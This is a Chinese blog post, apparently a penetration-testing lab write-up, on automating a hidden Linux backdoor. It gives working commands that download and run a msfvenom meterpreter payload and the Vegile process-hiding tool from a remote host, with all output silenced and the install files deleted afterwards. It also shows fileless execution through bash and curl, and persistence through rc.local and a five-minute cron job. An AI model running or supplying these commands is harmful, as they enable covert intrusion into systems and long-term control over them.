欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

利用bash脚本自动化创建linux后门

程序员文章站 2024-03-16 10:49:10
...

思路
1.准备好木马程序backdoor放到/var/www/html目录下。
2.编写自动化脚本

1)在/var/www/html下创建脚本
2) 切换到工作目录
3) 用&&命令符把vegile执行后门命令的步骤用&&拼接。&&上一条执行成功后再执行&&后的下一条。
4) 因为vegile有个步骤是按任意键退出,所以需要使用到命令符echo y |
5.) 因为要隐蔽进行,不能显示输出结果,所以要用到命令>> /dev/null 2>&1
6) 最后删除vegile的所有包

3.执行自动化命令bash < (curl -s -L http://192.168.72.131/autobackdoor.sh) >> /dev/null 2>&1
4.也可以将后门执行命令添加到开机启动项

实验开始
1.准备后门,用msfvenom编写了一个backdoor的后门。上传了Vegile-master.zip。
利用bash脚本自动化创建linux后门
2.编写bash自动化脚本
利用bash脚本自动化创建linux后门
代码如下:

#切换目录
cd /tmp/
#将Vegile隐藏执行后门的步骤用&&连接
#隐藏执行命令 >> /dev/null 2>&1
#Velige中需要按任意键退出,所以使用命令 echo y |
wget 192.168.72.136/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && wget 192.168.72.136/backdoor && chmod +x Vegile && chmod +x backdoor && echo y | ./Vegile --i backdoor >> /dev/null 2>&1
#删除安装包
rm -rf /tmp/Vegile-master.zip   /tmp/Vegile-master

3.运行自动化脚本
代码如下:

bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1

curl -s -L #curl 是一个利用 URL 语法在命令行下迚行文件传输的工具,这样好处是:本地丌会保存任何文件。
-s --silent #表示静默模式不输出任何内容
-L 跟 http 违接,组合使用的效果是把 http 违接中的文件下载到内存中,然后传 bash,迚行执行。
>> /dev/null 2>&1 不输出任何信息

4.也可以将后门执行命令添加到开机启动项
先给rc.load添加执行权限,因为有的centos的rc.load没有权限。
chmod +x /etc/rc.d/rc.local
添加到启动项中
echo "bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1" /etc/rc.d/rc.local

5.也可以将后门添加到计划任务中

1.先给/etc/crontab授权。vim /etc/crontab
2.将后门执行命令添加到计划任务中。
*/5 * * * * root bash <(curl -s -L http://192.168.72.136/autobackdoor) >> /dev/null 2>&1 保存退出就可以了。表示每五分钟执行一次。
分 时 天 月 周
*/5 * * * *

注意:
分 时 天 月 周
*/5 * * * *

实验时犯的错:
1.获取shell的时候把set payload linux/x64/meterpreter/reverse_tcp中的x64写成了x86导致shell一直连接不上。
2.常把bash脚本的后缀名.sh忘掉。
3.在编写.sh脚本的时候,要注意以下这个坑。
利用bash脚本自动化创建linux后门

相关标签: 渗透 安全 msf